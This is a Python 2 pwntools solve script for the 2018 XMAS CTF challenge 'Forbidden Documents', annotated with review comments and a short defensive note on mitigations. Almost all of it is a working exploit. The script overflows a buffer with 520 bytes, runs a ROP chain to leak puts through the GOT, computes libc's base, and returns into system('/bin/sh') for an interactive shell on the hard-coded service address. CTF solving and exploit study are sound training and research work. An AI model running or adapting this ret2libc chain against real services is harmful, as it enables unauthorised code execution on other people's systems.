Exploit for Forbidden Documents - XMAS CTF 2018
"""Solve script for the XMAS CTF 2018 challenge "Forbidden Documents".

What the script does (everything below is visible in the code; the
challenge binary itself is not on this page, so its behaviour is hedged):

* Talks to a remote service and answers three prompts, pointing the
  requested file path at /proc/self/fd/0 so the service reads its own
  stdin and the next line we send becomes the "file" content.
* Stage 1: a 520-byte overflow followed by a small ROP chain that calls
  puts() on the GOT slot of puts, leaking the libc address of puts.
* Stage 2: with libc's base derived from that leak, the same overflow is
  used to return into system() with a libc-resident string as argument.

Defensive reading: every address on the binary side is hard-coded, so the
chain presupposes a non-PIE binary; the leak presupposes a readable GOT
entry that is already resolved; and the overwrite presupposes no stack
protector on the overflowed frame (the filler runs straight into the
return address). PIE + ASLR, full RELRO and stack canaries each remove
one of those preconditions.

The script is written for Python 2 pwntools: ``str`` payloads are
concatenated with ``p64()`` output and with ``'\x00\x00'``, which raises
``TypeError`` under Python 3, where ``p64()``/``recv()`` return ``bytes``.
"""
from pwn import *
import re  # NOTE(review): unused in this script

# --- Binary-side addresses ---------------------------------------------------
# NOTE(review): the names indicate a PLT stub, a GOT entry and two ROP
# gadgets; the values are specific to the challenge binary and cannot be
# checked from this page.
puts_plt = 0x401030       # PLT entry used to call puts()
puts_got_plt = 0x404018   # GOT slot for puts; its contents are leaked in stage 1
poprdi = 0x4014f3         # presumably a `pop rdi; ret` gadget (rdi = 1st SysV argument)
ret = 0x401072            # presumably a bare `ret` gadget

# --- libc-relative offsets (used as libc_base +/- offset below) --------------
# NOTE(review): these only line up with the exact libc build the challenge
# service ran; any other build gives a wrong libc_base / system address.
puts_off = 0x68f90        # offset of puts inside libc
sh_off = 0x1619d9         # presumably the offset of a "/bin/sh" string inside libc
sys_off = 0x3f480         # offset of system inside libc

# Hard-coded endpoint of the 2018 challenge service.
p = remote("199.247.6.180", 10004)

# --- Stage 1: leak the libc address of puts through the GOT -----------------
# Three answers to the service's prompts (presumably: a file path, a y/n
# question, then a byte count -- confirm against the challenge binary).
# /proc/self/fd/0 is the service's own stdin, so the next line we send is
# consumed as the file content.
payload = '/proc/self/fd/0'
payload += '\n'
payload += 'n'
payload += '\n'
payload += '552'           # 520 filler bytes + 4 chain entries * 8 bytes
payload += '\n'
p.send(payload)
print(p.recvuntil("read: "))   # debug: echo the prompt text up to "read: "

# 520 bytes of filler reach the saved return address (frame layout is
# specific to the challenge binary), then the chain:
#   pop rdi  ->  rdi = &GOT[puts]  ->  puts@plt prints the libc pointer  ->  ret
payload = 'A'*520
payload += p64(poprdi)          # str + p64() result: Python 2 pwntools semantics
payload += p64(puts_got_plt)
payload += p64(puts_plt)
payload += p64(ret)             # presumably lands back in the service's input loop,
                                # since stage 2 answers the same prompts again -- confirm
p.sendline(payload)
p.recvuntil("Content: ")
data = p.recv(552)              # the 552 bytes the service prints after "Content: "; not used
# puts() prints the pointer without its high zero bytes; read 6 bytes and
# zero-extend to the 8 bytes that u64() expects.
raw_leak = p.recv(6) + '\x00\x00'
leak = u64(raw_leak)
log.success("Leak @ {}".format(leak))   # logged in decimal; {:#x} would read better
libc_base = leak - puts_off
sys = libc_base + sys_off       # NOTE(review): may shadow the `sys` module that `from pwn import *`
                                # brings in; harmless here, the name is only used as an address below
sh = libc_base + sh_off

# --- Stage 2: same prompts, chain now returns into system(sh) ---------------
payload = '/proc/self/fd/0'
payload += '\n'
payload += 'n'
payload += '\n'
payload += '544'           # 520 filler bytes + 3 chain entries * 8 bytes
payload += '\n'
p.send(payload)
print(p.recvuntil("read: "))   # debug echo, as in stage 1

#   pop rdi  ->  rdi = libc_base + sh_off  ->  libc_base + sys_off (system)
payload = 'A'*520
payload += p64(poprdi)
payload += p64(sh)
payload += p64(sys)
p.sendline(payload)
p.interactive()                 # hand the connection to the operator